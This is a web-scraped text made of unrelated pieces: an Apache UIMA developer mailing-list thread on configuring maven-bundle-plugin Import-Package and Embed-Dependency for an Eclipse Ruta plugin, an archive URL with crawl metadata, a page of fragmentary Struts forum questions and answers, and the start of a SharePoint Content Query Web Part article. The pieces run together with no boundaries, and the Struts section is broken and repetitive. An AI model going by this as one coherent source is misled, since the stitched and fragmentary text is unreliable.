text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91 values | source stringclasses 1 value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
pyA20EVB 0.2.0
Control GPIO, I2C and SPI
This is written for A20-SOM, but it can be used with other boards. If you do
this we cannot guarantee proper operation of the module. Before using this
package we recommend reading the article at olimex wiki:
When using GPIO make sure that the desired gpio is not used by another periphery.
GPIO METHODS
============
init() - Make initialization of the module. Always must be called first.
getcfg() - Read current configuration of gpio.
setcfg() - Write configuration to gpio.
input() - Return current value of gpio.
output() - Set output value.
pullup() - Set pull-up/pull-down.
The available constants are:
NAME - EQUALS TO
==== =========
HIGH -> 1
LOW -> 0
INPUT -> 0
OUPTUT -> 1
PULLUP -> 1
PULLDOWN -> 2
The gpio are named two ways:
By port name: PH0, PG2, PE10, etc.
These can be imported from port module:
>>> from pyA20EVB.gpio import port
>>> dir(port)
By connector name and pin number: gpio2p12, gpio3p8, etc.
These can be imported from connector module:
>>> from pyA20EVB.gpio import connector
>>> dir(connector)
Generally these constants are just an offset in the memory from the base GPIO address, so they can
be assigned to a number type variable.
>>> led = port.PH2
>>> print led
226
I2C METHODS
===========
init() - Make initialization of the module
open() - Begin communication with slave device
read() - Read from slave device
write() - Write data to slave device
close() - End communication with slave device
SPI METHODS
===========
open() - Open SPI bus with given configuration
read() - Read data from slave device without write
write() - Write data to slave device without read
xfer() - Do write and after that read
close() - Close SPI bus
Examples
========
GPIO::
#!/usr/bin/env python
from pyA20EVB.gpio import gpio
from pyA20EVB.gpio import port
from pyA20EVB.gpio import connector
gpio.init() #Initialize module. Always called first
gpio.setcfg(port.PG9, gpio.OUTPUT) #Configure LED1 as output
gpio.setcfg(port.PG9, 1) #This is the same as above
gpio.setcfg(port.PE11, gpio.INPUT) #Configure PE11 as input
gpio.setcfg(port.PE11, 0) #Same as above
gpio.pullup(port.PE11, 0) #Clear pullups
gpio.pullup(port.PE11, gpio.PULLDOWN) #Enable pull-down
gpio.pullup(port.PE11, gpio.PULLUP) #Enable pull-up
while True:
if gpio.input(port.PE11) == 1:
gpio.output(port.PG9, gpio.LOW)
gpio.output(port.PG9, 0)
else:
gpio.output(port.PG9, gpio.HIGH)
gpio.output(port.PG9, 1)
I2C::
#!/usr/bin/env python
from pyA20EVB import i2c
i2c.init("/dev/i2c-2") #Initialize module to use /dev/i2c-2
i2c.open(0x55) #The slave device address is 0x55
#If we want to write to some register
i2c.write([0xAA, 0x20]) #Write 0x20 to register 0xAA
i2c.write([0xAA, 0x10, 0x11, 0x12]) #Do continuous write with start address 0xAA
#If we want to do write and read
i2c.write([0xAA]) #Set address at 0xAA register
value = i2c.read(1) #Read 1 byte with start address 0xAA
i2c.close() #End communication with slave device
SPI::
#!/usr/bin/env python
from pyA20EVB import spi
spi.open("/dev/spidev2.0")
#Open SPI device with default settings
# mode : 0
# speed : 100000kHz
# delay : 0
# bits-per-word: 8
#Different ways to open device
spi.open("/dev/spidev2.0", mode=1)
spi.open("/dev/spidev2.0", mode=2, delay=0)
spi.open("/dev/spidev2.0", mode=3, delay=0, bits_per_word=8)
spi.open("/dev/spidev2.0", mode=0, delay=0, bits_per_word=8, speed=100000)
spi.write([0x01, 0x02]) #Write 2 bytes to slave device
spi.read(2) #Read 2 bytes from slave device
spi.xfer([0x01, 0x02], 2) #Write 2 byte and then read 2 bytes.
spi.close() #Close SPI bus
It's important that you run your python script as root!
Changelog
=========
* pyA20EVB 0.2.0 (03 SEP 2014)
* Initial release
- Downloads (All Versions):
- 5 downloads in the last day
- 53 downloads in the last week
- 196 downloads in the last month
- Author: Stefan Mavrodiev
- License: MIT
- Categories
- Package Index Owner: selfbg
- DOAP record: pyA20EVB-0.2.0.xml | https://pypi.python.org/pypi/pyA20EVB/0.2.0 | CC-MAIN-2015-48 | refinedweb | 657 | 61.12 |
Preprocessor directive supplies
information to compiler before to compile program. And depending on
preprocessor directive compiler takes decision and generate most optimize code
for processing.
Preprocessor directive starts with #
symbol and as it not programs statement so it does not end with semicolon (;).
There are many preprocessor directives
in C# and in this article we will see few most popular of them.
Let us clear one important concept at
first “Compiler takes decision in compile time with the help of preprocessor
directive”. Yes, in compile time compiler evaluate value of preprocessor
directive. Let us prove that in below example.
#define Souravusing System;namespace Test1{ class Program { static void Main(string[] args) { #if (Sourav) Console.WriteLine("Sourav is defined"); #else
Console.WriteLine("PI is not defined"); #endif } }}
In this
program we have define Sourav in first line of program. Now when we have
written if and else condition, automatically statement in else condition became
blur (in active). So from that its clear compiler is taking decision in compile
time. Now we will see few more example of preprocessor directive.
Using #define we can define any constant in
program. Try to understand below example.
#define Ausing System;namespace Test1{ class Program { static void Main(string[] args) { #if(A) Console.WriteLine("A is defined somewhere"); #endif Console.ReadLine(); } }}
Using #undef
we can undefined any predefined constant. Let’s see below example.
#define A#undef Ausing System;namespace Test1{ class Program { static void Main(string[] args) { #if(B) Console.WriteLine("A is defined somewhere"); #endif Console.WriteLine("A is not defined"); Console.ReadLine(); } }}
Here in
first line we have defined A and in second line we are just making it undefined
forcefully. And within Main() we are checking whether A is defined or not ? And
output is saying A is not defined in program.
Error directive
is used to generate error in program. Let’s see below example.
In first the
constant TrialVersion is defined and within if condition we are checking whether
the version is trial or not?
And when
we will compile this code it will show same error what we have defined within
error directive. We can see red color underline below of message.
Like error
message, we can show user defined warning in code. Let’s see below code.
As we have
used warning directive, it’s showing green underline below of warning message
Latest Articles
Latest Articles from Sourav.Kayal
Login to post response | http://www.dotnetfunda.com/articles/show/2434/preprocessor-directive-in-csharp | CC-MAIN-2018-47 | refinedweb | 405 | 60.21 |
37472/will-know-result-fabric-transaction-from-application-client
For hyperledger fabric you can use query ...READ MORE
I am not familiar with SpringBoot, but ...READ MORE
There are two ways to actually do ...READ MORE
I found the exact solution and syntax.. ...READ MORE
Summary: Both should provide similar reliability of ...READ MORE
This will solve your problem
import org.apache.commons.codec.binary.Hex;
Transaction txn ...READ MORE
To read and add data you can ...READ MORE
Yes, client is aware of the endorsing ...READ MORE
invokeChainCode(securityContext, functionName, args, options) {
...READ MORE
OR
At least 1 upper-case and 1 lower-case letter
Minimum 8 characters and Maximum 50 characters
Already have an account? Sign in. | https://www.edureka.co/community/37472/will-know-result-fabric-transaction-from-application-client | CC-MAIN-2022-21 | refinedweb | 119 | 53.47 |
Fixtures
It is very simple example, please, read something more complex if you need.
Fixtures are very powerful to play with your database sample data during development process. After each python manage.py reset <myapp> command you need to populate database with sample data again and again using admin interface. It's quite boring, isn't it? With fixtures our life became more comfortable and easy. Look at this example. Lets imagine that you have some data in db, so we can dump it. Even if your models have ForeignKeys or any kind of *To* relations.
First we need to define fixtures dir in settings file:
FIXTURE_DIRS = ( '/path/to/myapp/fixtures/', )
Lets dump our data:
cd /path/to/my_project python manage.py dumpdata --format=json myapp > /path/to/myapp/fixtures/initial_data.json
Reset:
python manage.py reset myapp You have requested a database reset. This will IRREVERSIBLY DESTROY any data for the "myapp" application in the database "mydb". Are you sure you want to do this? Type 'yes' to continue, or 'no' to cancel: yes
Now we have clean DB, lets populate it with our sample data:
python manage.py syncdb Loading 'initial_data' fixtures... Installing json fixture 'initial_data' from '/path/to/myapp/fixtures/'. Installed 24 object(s) from 1 fixture(s)
Fixture loading
The location where Django loads a fixture from might seem unintuitive. As with template files the fixtures off all applications in a project share the same namespace. If you follow [source:django/trunk/django/core/management/commands/loaddata.py?rev=9770#L79 loaddata.py] you see that Django searches for
*appnames*/fixtures and
settings.FIXTURE_DIRS and loads the first match. So if you use names like
testdata.json for your fixtures you must make sure that no other active application uses a fixture with the same name. If not, you can never be sure what fixtures you actually load.
Therefore it is suggested that you prefix your fixtures with the application names, e.g.
myapp/fixtures/myapp_testdata.json .
Links: | https://code.djangoproject.com/wiki/Fixtures?version=6 | CC-MAIN-2017-09 | refinedweb | 332 | 60.51 |
Known bugs in Python 2.2
Real bugs
These are actual bugs, and we will make fixes available as soon as we have them. (There may be other bugs that aren't generally worth knowing about; search the SourceForge bug tracker; you can also use that to report new bugs you find, of course.)
-.
- The -Qnew option is implemented incompletely: it turns / into true division, but unfortunately not /=. See SourceForge bug report #496549.
- Attempting to pickle the result of time.localtime() causes infinite recursion. See SourceForge bug report #496873.
- In Python 2.1, the StringIO module (though not cStringIO) supported Unicode. This capability is accidentally not present in Python 2.2.
- A deep copy (using copy.deepcopy()) of a recursive data structure built out of new-style classes would cause infinite recursion. See SourceForge bug report #497426.
- The Demo/extend subdirectory should not have been shipped; it contains an obsolete example. To build extensions, you should use distutils, which is documented extensively in the standard documentation bundle ("Distributing Python Modules").
Incompatibilities between Python 2.1[.1] and Python 2.2
The following visible differences between Python 2.2 and previous versions are intentional.
- Not everything is listed here; for the full list see the Misc/NEWS file in the distribution.
- Not listed here are various deprecated modules and features that may issue warnings: the warnings shouldn't affect the correct execution of your program, and they can be disabled with a command line option or programmatically; see the documentation for the warnings module.
- Also not listed are new constructs that used to be an error (e.g. "key in dict" is now a valid test where formerly it would always raise an exception).
-.
- The special attributes __members__ and __methods__ are no longer supported (for most built-in types). Use the new and improved dir() function instead.
- type("").__name__ == "str" # was "string"
- type(0L).__name__ == "long" # was "long int"
- Overflowing int operations return the corresponding long value rather than raising the OverflowError exception.
- Conversion of long to float now raises OverflowError if the long is too big to represent as a C double. This used to return an "infinity" value on most platforms.
-).
- An old tokenizer bug allowed floating point literals with an incomplete exponent, such as 1e and 3.1e-. Such literals now raise SyntaxError.
- Nested scopes are standard in 2.2 (they were enabled per module through "from __future__ import nested_scopes" in 2.1[.1]). This may change the meaning of code like the following:
def f(str): def g(x): return str(x) return gIn this example, the use of str inside the inner function g() now refers to the argument str in the outer function f(); previously (without nested scopes), it would refer to the built-in function str.
- Unbound method objects have their im_class field set differently. In previous versions, the im_class field was set to the class that defined the method. Now it is set to the class that was used to create the method object. For example:
class A: def meth(self): ... class B(A): ... # doesn't define meth class C(A): def meth(self): B.meth(self) # error, C doesn't inherit from BThis).
- The C API to the GC module has changed incompatibly. Extensions written to support the 2.1 version of the GC module will still compile, but the GC feature will be disabled.
- The contents of gc.garbage is different; it used to contain all uncollectible cycles; now it contains only objects in uncollectible cycles with a __del__ method.
- The hash order of dict items is different than in previous versions. (No code should rely on this order, but it's easy to forget this.)
- Assignment to __debug__ raises SyntaxError at compile-time.
- The UTF-16 codec was modified to be more RFC compliant. It will now only remove BOM characters at the start of the string and then only if running in native mode (UTF-16-LE and -BE won't remove a leading BMO character).
- Many error messages are different; in some cases an error condition raises a different exception (most common are cases where TypeError and AttributeError are swapped).
Differences between classic classes and new-style classes.)
- The method resolution order is different; see the tutorial.
-.)
- New-style class instances allow assignment to their __class__ attribute only if the C-level structure layout of the old and new class are the same. This prevents disasters like taking a list and changing its __class__ to make it a dict.
- New-style class objects don't support assignment to their __bases__ attribute.
- (I'm sure there are more differences that are relevant to the conversion of classic classes to new-style classes), but I can't think of then right now.)
To report a bug not listed above, always use the SourceForge Bug Tracker. If you have a patch, please use the SourceForge Patch Manager. Please mention that you are reporting a bug in 2.2! | http://www.python.org/download/releases/2.2/bugs/ | CC-MAIN-2013-20 | refinedweb | 827 | 58.58 |
Be seen. Boost your question’s priority for more expert views and faster solutions
import mx.transitions.Tween; import mx.transitions.easing.*; createEmptyMovieClip("friend_mc", 1); function loadXML(loaded) { if (loaded) { xmlNode = this.firstChild; friendText = []; total = xmlNode.childNodes.length; for (i=0; i<total;i++) { friendText[i] = xmlNode.childNodes[i].childNodes[0].nodeValue; var intStringLength = friendText[i].length; var intStringMaxWidth = intStringLength*13; var intMaxXPos = 850-intStringMaxWidth; var intRanXPos = Math.round(Math.random()*intMaxXPos); var intRanYPos = Math.round(Math.random()*380); friend_mc.createTextField("friendName_txt", 1, intRanXPos, intRanYPos, intStringMaxWidth, 41); friend_mc.friendName_txt.text = friendText[i] friend_mc.friendName_txt.embedFonts = true; friendformat = new TextFormat(); friendformat.font = "Brush Script MT"; friendformat.color = 0x006633; friendformat.size = 30; friendformat.bold = true; friend_mc.friendName_txt.setTextFormat(friendforma t); var visInTween:Tween = new Tween(friend_mc.friendName_txt, "_alpha", Regular.easeOut, 0, 100, 30, false); //var visOutTween:Tween = new Tween(friend_mc.friendName_txt, "_alpha", Regular.easeOut, 100, 0, 30, false); } friendNames(); } else { content = "file not loaded!"; } } xmlData = new XML(); xmlData.ignoreWhite = true; xmlData.onLoad = loadXML; xmlData.load("friends.xml"); ------------------------------------------------------------- friends.xml format: <?xml version="1.0" encoding="utf-8" standalone="yes"?> <friends> <friend>Friend 1</friend> <friend>Friend 2</friend> <friend>Friend 3</friend> etc..... </friends>
Open in new window
Thank you very much for your help on this!! I truly appreciate it! I tried the code you posted, and I am getting an error: "There is no property with the name 'onMotionFinished'. visInTween.onMotionFinishe
Thanks again
MX... wow that's old : )
i included a very old (6 years) prototype that'll do the same thing.
Open in new window.
Yeah, it is old, hehe, I'd like to get into this a lot more in the future, which should justify a newer version, but for now....
I tried the new code you gave, and I am still not seeing anything on the stage when it is run. I added a trace statement after the "strings.push(current);" line of code (trace (current);). When I run that, all of the strings from the .xml file are shown correctly in the trace window. I then tried a trace statement after the "textfield.text = current;" line of code (I tried both trace (textfield.text); and trace (textfield);) and both only yielded "undefined" in the trace box.
Again, thank you very much for your help with this!!!
Russ
you can also try setting the text immediately to something random ("Hello World") to make sure it's rendering.
ahh wait... MX doesn't return a reference to the textfield...
try changing line 43 from :
var textfield = container.createTextField(
to :
container.createTextField(
try that with the traces you have currently...
see normally (in every language but AS2 for FP7), you can say someVar = something();
but for unknown reasons in MX, createTextField didn't return a reference, so that's probably coming up empty...
change line 43 from :
var textfield = container.createTextField(
to :
container.createTextField(
var textfield = container.textfield;
working snippet attached
Open in new window
Thank you very much!! When I comment out the "textfield.embedFonts = true;" line of code it works! I need to do a little more work on the tween variables, but it is working and I sincerely thank you!! I have been wanting to get this going for quite some time, as I will be using it on a site that promotes a golf outing fund raiser my family and I host each year to help fight cancer. I truly appreciate all of your help and wish you all the best!! :)
Russ | https://www.experts-exchange.com/questions/26431061/ActionScript-2-load-text-from-xml-and-loop.html | CC-MAIN-2018-09 | refinedweb | 577 | 62.64 |
holding does not work as intended
Hello everyone, I am not a native speaker, so I am not too sure about how to express the problem I have, although I will certainly give my best to do so.
I was experimenting with sage a bit and wanted it to generate an overview of a specific simplification of specific root expressions, namely
sqrt(a + sqrt(b)) == sqrt(c) + sqrt(d) this simplification is possible under certain restraints for integers a and b, but that is not the point here.
For that matter I wanted to create a list of Tuples containing the expression exactly as written above and the corresponding boolean.
I therefore defined a function like this:
def test_cases(a): bs_cs_ds = [\ (SR(4*n*m), SR(n), SR(m))\ for (n,m) in [(x, a-x)\ for x in [1..floor(a/2)]]] expressions = [\ SR(a).add(sqrt(SR(b),hold=True),hold=True).sqrt(hold=True)\ == sqrt(SR(c), hold=True).add(sqrt(SR(d), hold=True), hold=True)\ for b,c,d in bs_cs_ds] return [(expr, bool(expr)) for expr in expressions]
So in my opinion I hold the evaluations/simplification for all possible functions (add and sqrt). But for some reason sage will still try to simplify the expressions. For example the input
test_cases(4)[1]
returns
(sqrt(4 + 4) == sqrt(2) + sqrt(2), True), instead of
(sqrt(4 + sqrt(16)) == sqrt(2) + sqrt(2), True).
So I apparently do not understand how holding works. I was under the impression, that it stops the evaluation/simplification for the given function or expression?
tl;dr:
SR(a).add(SR(sqrt(SR(b), hold=True)), hold=True).sqrt(hold=True) does not return the expression
sqrt(a + sqrt(b)) (one without any simplifications) for integers a,b, as I would expect for my input. But instead simplifies the inner root by factoring out etc.
To formulate a question: Can somebody correct my code to result in the intended behavior, or at least explain why Sage does not behave as expected from my point of view? | https://ask.sagemath.org/question/52230/holding-does-not-work-as-intended/ | CC-MAIN-2020-45 | refinedweb | 346 | 52.49 |
- Workers of the World
- Lock the Door Behind You
- On One Condition
- Reading, Writing, and Arithmetic
- Loose Threads
So far in this series we’ve looked at spawning new processes and communicating among them. Processes are the traditional mechanism for parallelism on UNIX platforms. Recently, however, the POSIX threading APIs have gained widespread support. Unlike processes created using fork(2), threads spawned with pthread_create(3) exist in the same address space as their parent.
Older versions of Linux relied on a userspace implementation provided by glibc. This technique put all of a process’s threads in the same kernel-scheduled entity and used timer signals to switch between them. More recent versions use the clone(2) system call, which is similar to fork(2) but allows the child process to share the parent’s address space. Other UNIX-like systems have similar mechanisms, although some use a N:M kernel-scheduled entities-to-threads mapping. This enables threads that spend most of their time waiting for data to be multiplexed onto a single kernelspace entity, while allowing CPU-limited ones to be scheduled independently. On paper, this strategy has a number of advantages, although in practice it is harder to get right.
Workers of the World
The primary reason for creating a thread is to get some work done in the background. Since the main way of getting work done in a C program is to call a function, the pthread_create(3) call takes a function as an argument and runs that function in a separate thread.
The function passed to the pthread_create(3) call takes a pointer as an argument, and returns a pointer. This pointer can later be retrieved using the pthread_join(3) function. This setup allows you to implement futures quite easily; your parent thread calls a function in a new thread, does some other work, and then waits for the worker thread to finish.
Listing 1 contains a simple program for determining whether a number is prime.
Listing 1 primes.c.
#include <stdio.h> #include <stdlib.h> #include <pthread.h> #include <math.h> #define PRIME 0 #define NOT_PRIME 1 void * make_sieve(int* numbers) { char * sieve = calloc(*numbers, sizeof(char)); int test_max = sqrt(*numbers) + 1; //From the definition of prime numbers: sieve[0] = sieve[1] = NOT_PRIME; //Create the sieve for(int i=2 ; i<test_max ; i++) { //If the current number is prime, try dividing all //subsequent potential primes by it if(sieve[i] == PRIME) { //Any number which is a product of a prime number //is not prime itself for(int j=i+i ; j<*numbers ; j+=i) { sieve[j] = NOT_PRIME; } } } return sieve; } int main(void) { pthread_t thread; int max = 20000; int test_number; char* sieve; //Spawn a thread to create the sieve pthread_create(&thread, NULL, (void*(*)(void*))make_sieve, (void*)&max); printf("Enter a number: "); scanf("%d", &test_number); //Collect the sieve pthread_join(thread, (void**)&sieve); //Check that the entered number is in range if(test_number >= max) { test_number = max-1; } if(sieve[test_number] == PRIME) { printf("\n%d is prime.\n", test_number); } else { printf("\n%d is not prime.\n", test_number); } return 0; }
When you run this program, it spawns a worker thread that crease a Sieve of Eratosthenes—an array indicating whether a range of numbers is prime. This process happens in the background while the program asks the user to enter a number. Once the user has entered the number, the main thread waits for the worker thread to finish and then uses the result to see whether the entered number is prime.
Note that the signature of the make_sieve() function doesn’t match that expected by the pthread_create(3) function. Because both accept a pointer, however, we can cast it to the correct form and receive no errors.
The pthread_create(3) call used in this program looks like this:
pthread_create(&thread, NULL, (void*(*)(void*))make_sieve, (void*)&max);
- The first argument is a pointer to a pthread_t that’s set to an identifier for this thread. Future thread operations should use this identifier to identify the created thread.
- The second argument specifies some attributes for the thread. This can be an attribute set created with the pthread_attr_*(3) family of functions, or NULL for the default options.
- The third and fourth arguments are the function to start and the argument to pass to it, respectively. Notice that we put in an explicit cast here so that our function can receive an int* rather than a void*. | http://www.informit.com/articles/article.aspx?p=686610&seqNum=2 | CC-MAIN-2019-35 | refinedweb | 737 | 59.33 |
I was searching for a file transfer program using winsock with tcp and udp. I found some code which are complex and most of them are MFC based. So problem was to convet it to a Non-MFC based program.
Another point is, the code should also be compatible with Linux sockets sys/socket.h All my code functions is compatible to Gnu's gcc compiler except some error handling part.
I had found most project here are quite complex to understand for beginner like me. So, I collected easy examples specially from MSDN and created a simple project.
It is so simple - That people will say - its just a damn child code. Nothing more than that.
I have avoided writing many comments, so its easy to see the code steps. This is wrong I know, but this is the way I write programs. I am also very lazy to do such things.
Gradually I will comment all my codes.
This is a program which has implemented Winsock 2.0 - has a utility class WComm which has very simple methods to create client/server program as well as File Transfer Utility.
Given below are very simple steps in very simple words to start with a client/server winsock application with winsock.
This sample project has a main program which implements both client and server according to the argument passed.
In the server code, there is a loop which listens for a client and when it gets the client connection, it moves to another loop - where it gets the client responses.
Client code is very simple - just connects to data, sends,receives, and ends.
Actually everything is very simple. One might see that the code is not good in error handling. This is because - its just made to make it more readable. This is the starting point. Now go ahead and implement whatever you want with it.
#include "wcomm.h"
void runclient(char *ip, char *fpath);
void runserver();
WComm w;
void main(int argc, char *argv[])
{
if(argc==1)runserver();
else runclient(argv[1],argv[2]);
}
void runserver()
{
// Start Server Daemon
w.startServer(27015);
printf("Server Started........\n");
while (TRUE) {
// Wait until a client connects
w.waitForClient();
printf("Client Connected......\n");
// Work with client
while(TRUE)
{
char rec[50] = "";
w.recvData(rec,32);w.sendData("OK");
if(strcmp(rec,"FileSend")==0)
{
char fname[32] ="";
w.fileReceive(fname);
printf("File Received.........\n");
}
if(strcmp(rec,"EndConnection")==0)break;
printf("Connection Ended......\n");
}
// Disconnect client
w.closeConnection();
}
}
void runclient(char *ip, char *fpath)
{
char rec[32] = "";
// Connect To Server
w.connectServer(ip,27015);
printf("Connected to server...\n");
// Sending File
w.sendData("FileSend"); w.recvData(rec,32);
w.fileSend(fpath);
printf("File Sent.............\n");
// Send Close Connection Signal
w.sendData("EndConnection");w.recvData(rec,32);
printf("Connection ended......\n");
}
Hope you will do much better than what I did.... :-)
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
A list of licenses authors might use can be found here
send( m_socket, filename, strlen(filename), 0 );
send( m_socket, filename, 32, 0 );
#include "stdafx.h"
#include "winsock2.h"
#include <stdio.h>
#include <conio.h>
#include <iostream>
#include <fstream>
General News Suggestion Question Bug Answer Joke Praise Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. | https://www.codeproject.com/Articles/13673/C-Winsock-Client-To-Server-File-Transfer-Made-Easy?msg=4470982 | CC-MAIN-2016-50 | refinedweb | 579 | 69.28 |
This is cool and greatly simplify things. So let me make sure I
understand,
I'll need WTP 1.5.1 to work with your fix (devtools 93). WTP 1.5.1 is
required for both build time and run time. Is this correct?
TIA, Lin
_____
From: Sachin Patel [mailto:sppatel@gmail.com] On Behalf Of Sachin Patel
Sent: Thursday, August 03, 2006 4:28 PM
To: user@geronimo.apache.org
Subject: Re: Use a different repo.
This Mojo shouldn't be used and will be removing it in trunk. I just
changed the installable runtime extension point in wtp (available in 1.5.1
builds). So you now no longer have to wrap the entire runtime binary inside
a plugin. And you installable runtime feature would simply contain a single
data entry instead of the plugin entry. Then in your update site (site.xml)
you map the data entry to whatever url your runtime is located at.
See the installableRuntime extension point defintion in WTP 1.5.1 driver for
an example.
On Aug 3, 2006, at 3:22 PM, Lin Sun wrote:
Hi Sachin,
I'd like to use my own repo (siteRoot below) to get the server image.
* @goal getg
*/
public class GetGMojo extends AbstractMojo {
/**
* @parameter expression=""
*/
private URL siteRoot;
Is there a better way to do it other than update the value of expression in
GetGMojo.java?
Thanks, Lin
-sachin | http://mail-archives.apache.org/mod_mbox/geronimo-user/200608.mbox/%3C002301c6b7f9$93699df0$eeea4109@raleigh.ibm.com%3E | CC-MAIN-2017-34 | refinedweb | 235 | 68.47 |
I found the previous investigation in the comments to uima-2560.
I can confirm that when running with the ruta-ep-engine built with embedded jars
approach, that this doesn't work for 3.7.2. I think what happens is the launch
configuration puts the target/classes folder into the bundle classpath, and the
bundle classpath loader is missing the facility to work with embedded jars
there. This is fixed in later Eclipse releases.
As the comment in uima-2560, this is even extended in 4.2 (?) versions of
Eclipse to work even if the Jars aren't in the target/classes, using some new
kinds of manifest instruction which specifies where to get the jars from maven.
I also found that if I copied just the ruta-ep-engine's built Jar file (with
embedded Jars) into Eclipse's "dropins" folder and restarted, and then changed
the Eclipse Application "launch" configuration to (a) launch with plug-ins
selected below only, and then *unchecked* in the "Workspace" section the
ruta-ep-engine, and *checked* in the Target Platform section the
org.apache.uima.ruta.engine, which causes the Jar to be used, then the launcher
worked find in 3.7.2.
-Marshall
On 9/4/2013 11:23 AM, Marshall Schor wrote:
> never mind- found it via doing mvn dependency:tree.
>
> mvn dependency:analyze reports warnings; I don't know if these are OK or not...
>
> [INFO] --- maven-dependency-plugin:2.8:analyze (default-cli) @ ruta-ep-ide ---
> [WARNING] Used undeclared dependencies found:
> [WARNING] org.eclipse.equinox:registry:jar:3.5.101:provided
> [WARNING] org.eclipse:jface:jar:3.7.0:provided
> [WARNING] org.eclipse.ui:workbench:jar:3.7.1:provided
> [WARNING] org.eclipse:osgi:jar:3.7.2:provided
> [WARNING] org.eclipse.equinox:common:jar:3.6.0:provided
> [WARNING] org.apache.uima:uimaj-core:jar:2.4.2:compile
> [WARNING] org.antlr:antlr-runtime:jar:3.5:compile
> [WARNING] Unused declared dependencies found:
> [WARNING] org.eclipse.dltk.validators:core:jar:3.0.0:provided
> [WARNING] org.eclipse:ui:jar:3.7.0:provided
> [WARNING] org.eclipse.swt:org.eclipse.swt.win32.win32.x86:jar:3.2.1:provided
> [WARNING] org.eclipse.equinox:app:jar:1.3.100:provided
> [WARNING] org.eclipse.emf.ecore:xmi:jar:2.7.0:provided
> [WARNING] org.eclipse.jdt:launching:jar:3.6.1:provided
> [INFO] ------------------------------------------------------------------------
> [INFO] BUILD SUCCESS
>
> On 9/4/2013 11:15 AM, Marshall Schor wrote:
>> ok, working on trying to understand the 1st class-not-found - the antlr char
>> stream one.
>> (I got that when I tried to run.)
>>
>> I see that comes from trying to load the RutaSourceParser java class, which has
>> references to org.antlr.runtime things, including CharStream.
>>
>> In the Eclipse source for that project (ruta-ep-ide), I thought I would see a
>> dependency on org.antlr.runtime in the dependencies section - but it's commented
>> out.
>>
>> I don't see how this dependency is being put on the build path (it is on the
>> build path, I checked). Can you enlighten me on this?
>>
>> -Marshall
>> On 9/4/2013 10:34 AM, Peter Klügl wrote:
>>> On 04.09.2013 16:10, Marshall Schor wrote:
>>>> I found the problem: When I got to the step:
>>>>
>>>> - right click on the script folder and create a new UIMA Ruta script file,
e.g. Test
>>>>
>>>> I must have right clicked on the folder, and created used the menu pick "new
>>>> file", instead of "new UIMA Ruta file".
>>>>
>>>> I tried again, and can get it to run.
>>>>
>>>> So, now back to the original problem - I'll have a look at getting it to
run as
>>>> an Eclipse Application without installing it from Eclipse - that's the issue,
>>>> correct?
>>> Yes, I think that eclipse 3.7.2 (or m2e) cannot resolve the inlined jars
>>> in development mode.
>>>
>>> Peter
>>>
>>>> -Marshall
>>>>
>>>> On 9/4/2013 8:04 AM, Peter Klügl wrote:
>>>>> Hmm, cannot reproduce it.
>>>>>
>>>>> Here's what I did:
>>>>>
>>>>> - mvn clean package the update site in Eclipse 3.7.2
>>>>> - installed the feature in another Eclipse 3.7.2 that already contains
>>>>> uima-tooling (was 2.4.1, but I do not think that makes a difference)
>>>>> - created project, created script file, created test file, launched
>>>>> debug, checked rule matches
>>>>>
>>>>> In your case, there was no exception? The line in the ruta code is:
>>>>>
>>>>> XMLInputSource in = new XMLInputSource(descriptorUrl);
>>>>>
>>>>> Best,
>>>>>
>>>>> Peter
>>>>>
>>>>>
>>>>> On 04.09.2013 13:41, Peter Klügl wrote:
>>>>>> On 04.09.2013 04:51, Marshall Schor wrote:
>>>>>>> Hi,
>>>>>>>
>>>>>>> Here's a fundamental question / confusion I'm having.
>>>>>>>
>>>>>>> It looks like the ruta-ep-engine is a collection of plain Jars
packaged up as
>>>>>>> one big OSGi bundle exporting a bunch of packages needed by Ruta.
The reason
>>>>>>> this packaging is needed is to turn these non-OSGi Jars into
(one) OSGi Bundle
>>>>>>> (Jar), so that Eclipse bundle resolution mechanism can knit these
together with
>>>>>>> other dependencies other OSGi plugins might need.
>>>>>>>
>>>>>>> Since the uimaj-ep-runtime Jar is already an Eclipse / OSGi bundle,
I think
>>>>>>> there's no reason to embed it. It will just be another exporter
of packages
>>>>>>> that other bundles can "import".
>>>>>>>
>>>>>>> I ran the build the way it is currently set up (without uimaj-ep-runtime
being
>>>>>>> embedded), and I also ran the ruta-eclipse-update-site build
so I could really
>>>>>>> install the result.
>>>>>>>
>>>>>>> Then I used the resulting update site to install ruta into a
3.7.2 Eclipse with
>>>>>>> UIMA 2.4.2 Eclipse tools (including the uimaj-ep-runtime).
>>>>>> My initial concern was that it works when installed but not when
started
>>>>>> using the sources.
>>>>>>
>>>>>>
>>>>>>> It appeared to install OK, and I tried to follow your instructions
for testing.
>>>>>>> This seemed to work, no obvious errors, but when I tried to run,
I may not have
>>>>>>> set things up right because I got:
>>>>>>>
>>>>>>> a connect window with a message "Source not found for
>>>>>>> FileURLConnection.connect() line: 101"
>>>>>>> and a stack trace in the console:
>>>>>>> FileURLConnection.connect() line: 101 [local variables unavailable]
>>>>>>> FileURLConnection.getInputStream() line: 189
>>>>>>> XMLInputSource.<init>(URL) line: 120
>>>>>>> Ruta.wrapAnalysisEngine(URL, String, boolean String) line: 96
>>>>>>> RutaLauncher.main(String[]) line: 119
>>>>>>>
>>>>>>> What did I do wrong?
>>>>>> What is the structure of your Ruta project? Is the script you launched
>>>>>> within a source (script) folder?
>>>>>>
>>>>>> The message surprises me a bit. Was there an xmi file in the output
>>>>>> folder? Maybe there was an exception and eclipse tried to jump to
the
>>>>>> position, but couldn't find the sources.
>>>>>>
>>>>>>> Anyways, no obvious mis-linkages; Is this what you expect from
running as an
>>>>>>> installed plugin (not in Eclipse App Debug mode)?
>>>>>> Nope, it should - of course - work without any problems. I will try
to
>>>>>> reproduce it ASAP.
>>>>>>
>>>>>>
>>>>>> Peter
>>>>>>
>>>>>>> -Marshall
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> On 9/3/2013 12:34 PM, Peter Klügl wrote:
>>>>>>>> On 03.09.2013 18:09, Marshall Schor wrote:
>>>>>>>>> On 9/3/2013 11:26 AM, Peter Klügl wrote:
>>>>>>>>>> On 03.09.2013 16:58, Marshall Schor wrote:
